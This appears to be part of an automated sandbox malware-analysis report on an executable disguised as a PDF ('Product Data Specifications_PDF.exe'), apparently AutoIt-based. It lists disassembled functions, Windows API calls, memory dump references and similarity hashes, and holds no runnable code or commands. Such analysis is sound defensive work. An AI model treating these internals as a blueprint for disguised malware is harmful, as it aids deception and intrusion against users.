                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                              • String ID:
                              • API String ID: 2223660684-0
                              • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                              • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                              • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                              • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                              • LineTo.GDI32(?,?,?), ref: 00447326
                              • EndPath.GDI32(?), ref: 00447336
                              • StrokePath.GDI32(?), ref: 00447344
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                              • String ID:
                              • API String ID: 2783949968-0
                              • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                              • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                              • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                              APIs
                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                              • GetCurrentThreadId.KERNEL32 ref: 004364A3
                              • AttachThreadInput.USER32(00000000), ref: 004364AA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                              • String ID:
                              • API String ID: 2710830443-0
                              • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                              • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                              • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                              • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                              • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                              • String ID:
                              • API String ID: 146765662-0
                              • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                              • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                              • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472B63
                              • GetDC.USER32(00000000), ref: 00472B6C
                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                              • ReleaseDC.USER32(00000000,?), ref: 00472B99
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                              • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                              • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                              APIs
                              • GetDesktopWindow.USER32 ref: 00472BB2
                              • GetDC.USER32(00000000), ref: 00472BBB
                              • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                              • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CapsDesktopDeviceReleaseWindow
                              • String ID:
                              • API String ID: 2889604237-0
                              • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                              • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                              • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                              APIs
                              • __getptd_noexit.LIBCMT ref: 00415150
                                • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                              • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                              • __freeptd.LIBCMT ref: 0041516B
                              • ExitThread.KERNEL32 ref: 00415173
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                              • String ID:
                              • API String ID: 1454798553-0
                              • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                              • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                              • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: _strncmp
                              • String ID: Q\E
                              • API String ID: 909875538-2189900498
                              • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                              • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                              • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                              APIs
                              • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                               • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                               • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                              • String ID: AutoIt3GUI$Container
                              • API String ID: 2652923123-3941886329
                              • Opcode ID: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                              • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                              • Opcode Fuzzy Hash: 8072d5a6eeba690fa35a4ade7926f5ea60e583888e5bb087a82b37f5ec0490ad
                              • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                              APIs
                              Strings
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: U$\
                              • API String ID: 2666721431-100911408
                              • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                              • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                              • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • __wcsnicmp.LIBCMT ref: 00467288
                              • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                              Strings
                              Similarity
                              • API ID: Connection__wcsnicmp_wcscpy_wcslen
                              • String ID: LPT
                              • API String ID: 3035604524-1350329615
                              • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                              • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                              • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                              APIs
                              Strings
                              Similarity
                              • API ID: _memmove
                              • String ID: \$h
                              • API String ID: 4104443479-677774858
                              • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                              • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                              • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                              APIs
                              Strings
                              Similarity
                              • API ID: _memcmp
                              • String ID: &
                              • API String ID: 2931989736-1010288
                              • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                              • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                              • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                              APIs
                              Strings
                              Similarity
                              • API ID: _memmove
                              • String ID: \
                              • API String ID: 4104443479-2967466578
                              • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                              • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                              • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                              APIs
                              • _wcslen.LIBCMT ref: 00466825
                              • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                              Strings
                              Similarity
                              • API ID: CrackInternet_wcslen
                              • String ID: |
                              • API String ID: 596671847-2343686810
                              • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                              • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                              • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                              APIs
                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                              Strings
                              Similarity
                              • API ID: MessageSend
                              • String ID: '
                              • API String ID: 3850602802-1997036262
                              • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                              • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                              • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                              APIs
                              • _strlen.LIBCMT ref: 0040F858
                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                              • _sprintf.LIBCMT ref: 0040F9AE
                              Strings
                              Similarity
                              • API ID: _memmove$_sprintf_strlen
                              • String ID: %02X
                              • API String ID: 1921645428-436463671
                              • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                              • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                              • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                              APIs
                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                              Strings
                              Similarity
                              • API ID: MessageSend
                              • String ID: Combobox
                              • API String ID: 3850602802-2096851135
                              • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                              • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                              • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                              APIs
                              • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                              Strings
                              Similarity
                              • API ID: LengthMessageSendTextWindow
                              • String ID: edit
                              • API String ID: 2978978980-2167791130
                              • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                              • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                              • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                              APIs
                              • Sleep.KERNEL32(00000000), ref: 00476CB0
                              • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                              Strings
                              Similarity
                              • API ID: GlobalMemorySleepStatus
                              • String ID: @
                              • API String ID: 2783356886-2766056989
                              • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                              • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                              • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                              APIs
                              Strings
                              Similarity
                              • API ID: htonsinet_addr
                              • String ID: 255.255.255.255
                              • API String ID: 3832099526-2422070025
                              • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                              • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                              • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                              APIs
                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                              Strings
                              Similarity
                              • API ID: InternetOpen
                              • String ID: <local>
                              • API String ID: 2038078732-4266983199
                              • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                              • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                              • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                              APIs
                              Strings
                              Similarity
                              • API ID: __fread_nolock_memmove
                              • String ID: EA06
                              • API String ID: 1988441806-3962188686
                              • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                              • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                              • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                              APIs
                              Strings
                              Similarity
                              • API ID: _memmove
                              • String ID: u,D
                              • API String ID: 4104443479-3858472334
                              • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                              • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                              • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                              • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                              APIs
                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • wsprintfW.USER32 ref: 0045612A
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: MessageSend_mallocwsprintf
                              • String ID: %d/%02d/%02d
                              • API String ID: 1262938277-328681919
                              • Opcode ID: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                              • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                              • Opcode Fuzzy Hash: 7568e53d503701dc6c53574dfbed37be0c9226c9331a2ec32bea4e30f7db6fe8
                              • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                              APIs
                              • InternetCloseHandle.WININET(?), ref: 00442663
                              • InternetCloseHandle.WININET ref: 00442668
                                • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CloseHandleInternet$ObjectSingleWait
                              • String ID: aeB
                              • API String ID: 857135153-906807131
                              • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                              • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                              • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                              • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                              APIs
                              Strings
                              • ^B, xrefs: 00433248
                              • C:\Users\user\Desktop\Product Data Specifications_PDF.exe, xrefs: 0043324B
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
